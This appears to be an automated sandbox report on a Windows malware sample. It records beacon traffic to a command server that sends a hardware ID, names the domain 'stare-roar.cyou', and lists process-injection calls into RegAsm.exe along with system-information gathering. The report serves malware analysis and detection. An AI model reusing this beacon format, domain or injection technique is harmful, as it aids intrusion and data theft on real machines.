2024-12-11 09:45:21 UTC	87	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 26 6a 3d 26 68 77 69 64 3d 35 38 45 41 46 36 45 33 41 32 43 35 33 37 37 32 35 39 43 34 31 31 45 30 36 46 36 32 46 36 35 43 Data Ascii: act=get_message&ver=4.0&lid=yau6Na--6928154717&j=&hwid=58EAF6E3A2C5377259C411E06F62F65C
2024-12-11 09:45:22 UTC	1017	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 09:45:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=25t1ga4qi0epj3ige9he0qhp59; expires=Sun, 06-Apr-2025 03:32:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AlX2p4%2BO2zj5SfKO8Vxdb3bz2fci%2FptzwMHVyHmRbRrLKc4o6uGi8YU%2Bhy6Bxwi8w3U8NuUkeDUxyHuu%2BTrS5vPTd2%2BuBRuQirlxDru9DwPYR%2F36FItxXGai9CluTrcfHWk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f048a9a39b732fc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1816&rtt_var=681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=986&delivery_rate=1607044&cwnd=226&unsent_bytes=0&cid=e284e55c611a7c0b&ts=740&x=0"
2024-12-11 09:45:22 UTC	54	IN	Data Raw: 33 30 0d 0a 75 6b 34 4d 55 34 31 2f 7a 43 67 31 34 56 33 43 75 6c 35 78 64 4f 47 64 50 49 65 39 67 71 31 4d 67 56 52 6a 7a 42 6b 53 2f 38 58 68 45 77 3d 3d 0d 0a Data Ascii: 30uk4MU41/zCg14V3Cul5xdOGdPIe9gq1MgVRjzBkS/8XhEw==
2024-12-11 09:45:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	04:44:57
Start date:	11/12/2024
Path:	C:\Users\user\Desktop\EBUdultKh7.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\EBUdultKh7.exe"
Imagebase:	0xf80000
File size:	44'544 bytes
MD5 hash:	7C8C89E28B6034FE5B87B59D127BA505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:45:00
Start date:	11/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ypmbwesq\ypmbwesq.cmdline"
Imagebase:	0xb20000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:45:00
Start date:	11/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	04:45:00
Start date:	11/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6F80.tmp" "c:\Users\user\AppData\Local\Temp\ypmbwesq\CSC8091DC6DAAC840838D6B58938AE1A03F.TMP"
Imagebase:	0x660000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	04:45:00
Start date:	11/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Imagebase:	0xd10000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	23.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	115
Total number of Limit Nodes:	3

Executed Functions

Function 03222805 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 03222A46

Memory Dump Source

Source File: 00000000.00000002.1416316692.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_EBUdultKh7.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f4710fa15c73f779317d4337b70d6a80a7bb309f3b6a243c497971ca707c8ebd
Instruction ID: efc01743782cb6de5127287d5a67d16439fa7e5967466afb7dd4b3d90edd0d3a
Opcode Fuzzy Hash: f4710fa15c73f779317d4337b70d6a80a7bb309f3b6a243c497971ca707c8ebd
Instruction Fuzzy Hash: D8A14A71D1032ADFEB64CF69CC417EEBBB2BB44310F1485A9E818A7240DB759985CF91

Function 03222810 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 03222A46

Memory Dump Source

Source File: 00000000.00000002.1416316692.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_EBUdultKh7.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0e65ddf7e47818a16da94584dbfd87a555e3123b31d071695162cdfd083b219d
Instruction ID: 5fbb517c4615eea579ac18d142ee9e2f7be21126e5b12071f93810ac13f523fd
Opcode Fuzzy Hash: 0e65ddf7e47818a16da94584dbfd87a555e3123b31d071695162cdfd083b219d
Instruction Fuzzy Hash: F6914871D1032ADFEB64CF69CC40BDEBBB2BB48310F1485A9E818A7240DB759985CF91

Function 03222581 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 03222618

Memory Dump Source

Source File: 00000000.00000002.1416316692.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_EBUdultKh7.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4c9292b716a84b28eb7616f0ca2c128c57fdae0ff923d368f62e02986db47ba6
Instruction ID: 57cd52e65cef676d5d3484ea1a4b7172aa29568adef784b70ca3b3c896ce06ea
Opcode Fuzzy Hash: 4c9292b716a84b28eb7616f0ca2c128c57fdae0ff923d368f62e02986db47ba6
Instruction Fuzzy Hash: 192137719003199FDB10CFAAC881BDEBBF5FF48310F148829E918A7240D7799944CB60

Function 03222588 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 03222618

Memory Dump Source

Source File: 00000000.00000002.1416316692.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_EBUdultKh7.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8e03dfda2e133f77a5897be7d5094bf77b2beeb8d9b74d232cbe69d0be28253b
Instruction ID: 8ff256aefc1fe0c617a614b7e2bbf8881d1f3698b7d030340f263b8d1916aa58
Opcode Fuzzy Hash: 8e03dfda2e133f77a5897be7d5094bf77b2beeb8d9b74d232cbe69d0be28253b
Instruction Fuzzy Hash: 522127759003599FDB10DFAAC881BEEBBF5FF48310F148829E918A7340D7799954CBA4

Function 032223E8 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0322246E

Memory Dump Source

Source File: 00000000.00000002.1416316692.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_EBUdultKh7.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: dea60a01cb7eeed9fcfc6053b90c13d899df2c3866a19031b26247bb056f1ed1
Instruction ID: 5d4df1b8128e1a304b0a78ecb690445a97a4f7c6c9c223746f96861232b2eb5e
Opcode Fuzzy Hash: dea60a01cb7eeed9fcfc6053b90c13d899df2c3866a19031b26247bb056f1ed1
Instruction Fuzzy Hash: B82157719003099FDB10DFAAC8817EEFBF4EF88224F548429D559A7240CB78A945CFA1

Function 03222670 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 032226F8

Memory Dump Source

Source File: 00000000.00000002.1416316692.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_EBUdultKh7.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 34a5cf709cd6a2e07499fbfcdf61d5323de57cb1c0e0cdb3c44d4cc08342e200
Instruction ID: 002531a396bb6c54e9469bd18a74989d714196dfa645f6bcf2adf3bf747f627d
Opcode Fuzzy Hash: 34a5cf709cd6a2e07499fbfcdf61d5323de57cb1c0e0cdb3c44d4cc08342e200
Instruction Fuzzy Hash: 9D2126758003499FDB10CFAAC880BEEBBF5FF48320F10882EE559A7240C7399945CB60

Function 032223F0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0322246E

Memory Dump Source

Source File: 00000000.00000002.1416316692.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_EBUdultKh7.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: de3fee7543c53cd13fd769d66eb3cd55c2bcce313bc6e85610cfba5411e25fea
Instruction ID: 61a2b7cdb5235f1b8bece55e86fd04a8e6ccbfeece0b116bc57f784a96a59615
Opcode Fuzzy Hash: de3fee7543c53cd13fd769d66eb3cd55c2bcce313bc6e85610cfba5411e25fea
Instruction Fuzzy Hash: 7E2135719003099FDB10DFAAC8857EEBBF4AF88324F54842AD459A7240CB78A944CFA1

Function 03222678 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 032226F8

Memory Dump Source

Source File: 00000000.00000002.1416316692.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_EBUdultKh7.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 36806b5c46a0ab7e0e324d1ad02d55c2aff7b05fe59e4f5cac8a5d578f64b6b6
Instruction ID: c79631ca771af8d4019a24de04bb4880e93ec50270d56752cde34a28cc92c308
Opcode Fuzzy Hash: 36806b5c46a0ab7e0e324d1ad02d55c2aff7b05fe59e4f5cac8a5d578f64b6b6
Instruction Fuzzy Hash: A42128718003599FDB10DFAAC880BEEFBF5FF48320F508429E519A7240C7799944DBA0

Function 032224C1 Relevance: 1.6, APIs: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 03222536

Memory Dump Source

Source File: 00000000.00000002.1416316692.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_EBUdultKh7.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 43bbb9fbd3a2235335c1366f583629fb3cbcc32e227f1a02980b0e670c5e3b47
Instruction ID: df244a89b08d1be9fba19bf313753a114268bad8391ba7f28468caf92f55c7db
Opcode Fuzzy Hash: 43bbb9fbd3a2235335c1366f583629fb3cbcc32e227f1a02980b0e670c5e3b47
Instruction Fuzzy Hash: 551126728003499FDB14DFAAD845BDEFBF5EF88320F148819E519A7250C77A9950CFA0

Function 03222339 Relevance: 1.6, APIs: 1, Instructions: 53
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 032223A2

Memory Dump Source

Source File: 00000000.00000002.1416316692.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_EBUdultKh7.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f303c74eb9f7a32a6eb1d7f2ef84b684b7deb0bd2348b342df806c892dccdfc6
Instruction ID: 1051414323c0a01dc564ffb953879165d4d1f4af8325669e2e4c755637c99f5f
Opcode Fuzzy Hash: f303c74eb9f7a32a6eb1d7f2ef84b684b7deb0bd2348b342df806c892dccdfc6
Instruction Fuzzy Hash: A61158718003498FDB10DFAAC845BDEFBF8EF88220F148819D559A7340CB796941CFA0

Function 032224C8 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 03222536

Memory Dump Source

Source File: 00000000.00000002.1416316692.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_EBUdultKh7.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d37146bc2abffac726419f8b899e41f08a62a9605a22a6b20229345fa5881c27
Instruction ID: 1c83b275dc75c82e5c0969a9dd45b1337c76a1979d11767cad96272452616213
Opcode Fuzzy Hash: d37146bc2abffac726419f8b899e41f08a62a9605a22a6b20229345fa5881c27
Instruction Fuzzy Hash: BC1126718003499FDB14DFAAC844BDEBBF5AF88320F148819E519A7250C7799550CFA0

Function 03222340 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 032223A2

Memory Dump Source

Source File: 00000000.00000002.1416316692.0000000003220000.00000040.00000800.00020000.00000000.sdmp, Offset: 03220000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3220000_EBUdultKh7.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 89d6712acc523e6c4609bc95ccb271b53531d9fd7d618c32dbf3b8e8b469a8d2
Instruction ID: 2fda2f29d2a9abe0caf54f072fa54a995e9adaacc7526dc4fcecf454e0691043
Opcode Fuzzy Hash: 89d6712acc523e6c4609bc95ccb271b53531d9fd7d618c32dbf3b8e8b469a8d2
Instruction Fuzzy Hash: F1113A719003498FDB14DFAAC8457DEFBF5AF88620F148819D519A7340CB796544CF94

Analysis Process: RegAsm.exePID: 7688, Parent PID: 7492COMMON

Execution Graph

Execution Coverage:	8.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	70%
Total number of Nodes:	267
Total number of Limit Nodes:	21

Executed Functions

Function 00437A60 Relevance: 33.9, APIs: 11, Strings: 8, Instructions: 617
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(00442688,00000000,00000001,00442678,00000000), ref: 00437B70
SysAllocString.OLEAUT32(79CF7B5F), ref: 00437BE8
CoSetProxyBlanket.COMBASE(0000CDCC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437C2E
SysAllocString.OLEAUT32(?), ref: 00437C90
SysAllocString.OLEAUT32(29E12BD1), ref: 00437D53
VariantInit.OLEAUT32(?), ref: 00437DC2

Strings

w2u, xrefs: 00437A8F
C, xrefs: 00437B1F
7cba, xrefs: 00437AA7
sq, xrefs: 00437A87
\, xrefs: 00437B2A
5, xrefs: 00437B35
13, xrefs: 00437B7E
/-, xrefs: 00437CA2

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AllocString$BlanketCreateInitInstanceProxyVariant
String ID: 5$7cba$C$\$/-$13$sq$w2u
API String ID: 65563702-4242717481
Opcode ID: 39b8e4aa71d3c528dfe5a72c84458920e48887e8f388364721c040036ad3ad57
Instruction ID: 5a19421fc7537c536671e1b2346d769959e7bf4d9625a3db8eec913121932dc6
Opcode Fuzzy Hash: 39b8e4aa71d3c528dfe5a72c84458920e48887e8f388364721c040036ad3ad57
Instruction Fuzzy Hash: DD22DD716083418BD724CF24C881B6BBBE5EB89314F149A2EF5959B381D778D806CB9A

Function 0040E8DE Relevance: 22.8, APIs: 1, Strings: 14, Instructions: 339
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00432A40: GetSystemMetrics.USER32 ref: 00432A82
Part of subcall function 00432A40: GetSystemMetrics.USER32 ref: 00432A92

CoUninitialize.COMBASE ref: 0040E8F3

Strings

_], xrefs: 0040EB53
W%U, xrefs: 0040EB69
2, xrefs: 0040E908
0;, xrefs: 0040EC6D
jXl>, xrefs: 0040E9F8
M_, xrefs: 0040EC2F
stare-roar.cyou, xrefs: 0040ED4A
/X, xrefs: 0040EC24
HY, xrefs: 0040EC3A
,3, xrefs: 0040ECD8
SQ, xrefs: 0040EB5E
Hp, xrefs: 0040E901
V1;, xrefs: 0040ECC1
HLB6, xrefs: 0040EA0E

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: MetricsSystem$Uninitialize
String ID: ,3$/X$2$HLB6$Hp$HY$M_$V1;$jXl>$stare-roar.cyou$0;$SQ$W%U$_]
API String ID: 1128523136-1356292305
Opcode ID: e3750c7673a21cfba0337862dec5980751c498a7b8c8ce5db387aa770b298bdb
Instruction ID: b88efe1386890df7d6945f81b7f79e7d9f088a638de02a54af47094dcdd08db3
Opcode Fuzzy Hash: e3750c7673a21cfba0337862dec5980751c498a7b8c8ce5db387aa770b298bdb
Instruction Fuzzy Hash: 93B1EFB150D3D18AD3358F29C4947AFBBE2AFE2304F18896DD4D96B282C7794406CB96

Function 004237B0 Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 531
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

9ONA, xrefs: 004239B5
S3W5, xrefs: 0042399D
1K-M, xrefs: 004239AD
P_, xrefs: 00423E69
I7UI, xrefs: 004239A5
qw, xrefs: 00423AFA
po, xrefs: 004237F6
~<B, xrefs: 0042395D
P?n1, xrefs: 00423A46

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: 1K-M$9ONA$I7UI$P?n1$P_$S3W5$po$~<B$qw
API String ID: 0-605876809
Opcode ID: a91565a51bc7e4a49e15f5b3f9909ebe120e4c52bb0cc2705b3fbca57836c837
Instruction ID: 3ac902aa5be2f23ed2ce3e08783e9a346a55879d0bf298933cd20e2451c9ac42
Opcode Fuzzy Hash: a91565a51bc7e4a49e15f5b3f9909ebe120e4c52bb0cc2705b3fbca57836c837
Instruction Fuzzy Hash: 4902EEB6A083409FD314CF65E88166BBAF1EFD6305F09892DF5868B351E778C905CB86

Function 00409CF0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 223
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00409D12
GetCurrentThreadId.KERNEL32 ref: 00409D25
GetCurrentProcessId.KERNEL32 ref: 00409D2D
GetForegroundWindow.USER32(?), ref: 00409ED5
ExitProcess.KERNEL32 ref: 00409FBC

Strings

Fun*, xrefs: 00409D33

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: Fun*
API String ID: 4063528623-3989110201
Opcode ID: 66eb39779a4296dc1ffcf2d3d16c7361f6176381c4cb9c53229909d0215fd791
Instruction ID: 852ebd4a0b0f2b228de3fee50fa218563bb262d71e561240805347edf5c415e1
Opcode Fuzzy Hash: 66eb39779a4296dc1ffcf2d3d16c7361f6176381c4cb9c53229909d0215fd791
Instruction Fuzzy Hash: FE712873B487044BD308EEA9CC8575BF6D6ABC8310F0AC53DA984DB399EE789C094685

Function 00421B70 Relevance: 10.6, Strings: 8, Instructions: 592
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

&, xrefs: 00421E82
/, xrefs: 00422209
*, xrefs: 00422213
$, xrefs: 00421E92
!@, xrefs: 00421BA6
6, xrefs: 00421DC6
+, xrefs: 0042220E
,, xrefs: 0042217A

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: AllocateHeapInitializeThunk
String ID: !@$$$&$*$+$,$/$6
API String ID: 383220839-385272708
Opcode ID: 41a6b3f710d8969f755fbbbd462f805771adb3c9a587b6d8eb1a47c0ae000a39
Instruction ID: bb5d4ac9d7ac118772b4d4b928ee1e20d98d6f1ba665c59e88a5418bc1cfe273
Opcode Fuzzy Hash: 41a6b3f710d8969f755fbbbd462f805771adb3c9a587b6d8eb1a47c0ae000a39
Instruction Fuzzy Hash: 0E320F7160C3A08FD324CF28D5813AFBBE2AB95314F58892EE5D587392D7BD88418B57

Function 0040AC50 Relevance: 9.2, Strings: 7, Instructions: 419
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/kc, xrefs: 0040AD83
$, xrefs: 0040ADEC
7kc, xrefs: 0040ADB8
, xrefs: 0040AD03, 0040AE8B, 0040ACEF
58EAF6E3A2C5377259C411E06F62F65C, xrefs: 0040AD09
, xrefs: 0040AEC0, 0040B063, 0040B120, 0040B12F
, xrefs: 0040ACC3

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: $$$/kc$58EAF6E3A2C5377259C411E06F62F65C$7kc$$
API String ID: 0-543297375
Opcode ID: 2da96ee537804194a643e146d061cc656453008532d1b7af2e9d6df7654ef76b
Instruction ID: a4f5ad689a8e5a13a1409e3c2dd42de5d6e8b28ece47dcb3ca406c0a29886686
Opcode Fuzzy Hash: 2da96ee537804194a643e146d061cc656453008532d1b7af2e9d6df7654ef76b
Instruction Fuzzy Hash: FED1DFB15083808BD314CF25C8517ABBBE6EFD2314F189A2DE1E59B291D778C909CB97

Function 0042C347 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 501
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 0042C446
GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C47D
GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 0042C55B

Strings

Wu, xrefs: 0042C446

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ComputerName$FreeLibrary
String ID: Wu
API String ID: 2243422189-4083010176
Opcode ID: ccbfec4926d89580cb6029e81c09543b949044733e006ce61f30b6b26fdc03de
Instruction ID: e4edc6cf4ddf7ceee8c30b227b3d0047d959fb51091ebbeb43b78491ed38562a
Opcode Fuzzy Hash: ccbfec4926d89580cb6029e81c09543b949044733e006ce61f30b6b26fdc03de
Instruction Fuzzy Hash: BAE10B60604B918FE725CF35C4907A7BBE19F57314F48889EC0EA8B392D73DA50ACB65

Function 00418835 Relevance: 5.3, Strings: 4, Instructions: 307
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@CE], xrefs: 004188E7, 004188EE
hl, xrefs: 00418890
cfgd, xrefs: 00418885
QOTL, xrefs: 0041887A

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: @CE]$QOTL$cfgd$hl
API String ID: 0-3013581571
Opcode ID: 9fc0ebf82a2506da0cae2338dfe4d31255ee10771461f806e42da46dcc58ad27
Instruction ID: 4dd7a39e8d060cd5be61a80f827584b56940c4858440026802db523bf1b2b87e
Opcode Fuzzy Hash: 9fc0ebf82a2506da0cae2338dfe4d31255ee10771461f806e42da46dcc58ad27
Instruction Fuzzy Hash: 8BA157B69083508BC7208F24D8423DBB7E1EF92354F04492EE9D95B391EB789885CBD6

Function 0042C33F Relevance: 3.5, APIs: 2, Instructions: 492
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C47D
GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 0042C55B

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 585f4a1306b74eea269b2d50c7b51c111cdbc4647e84d079fd7fddeb48e1a0ec
Instruction ID: 261b9530a318ba0eb9fec1959537bb8932864cba18f04290be566d469ef75990
Opcode Fuzzy Hash: 585f4a1306b74eea269b2d50c7b51c111cdbc4647e84d079fd7fddeb48e1a0ec
Instruction Fuzzy Hash: 38E1F760704B918FE7258F39C4907A7BBE19F57310F48895EC0EA8B782D73CA50ADB65

Function 0041692E Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93bd13afa4948f649b9573e8eda3b78b900c0ddc72ff0de281a183116085559d
Instruction ID: e38742641224ec00075f6a0714467d90405bc9430059732ec07dd51c60cfe27e
Opcode Fuzzy Hash: 93bd13afa4948f649b9573e8eda3b78b900c0ddc72ff0de281a183116085559d
Instruction Fuzzy Hash: BA5107B1A083518FC724CF29C4816ABB7E1AF94304F198A2EE5E9C7352D638D845CB86

Function 0042CB27 Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

WXQ#, xrefs: 0042CCC0

Memory Dump Source

Source File: 00000005.00000002.1623201460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd

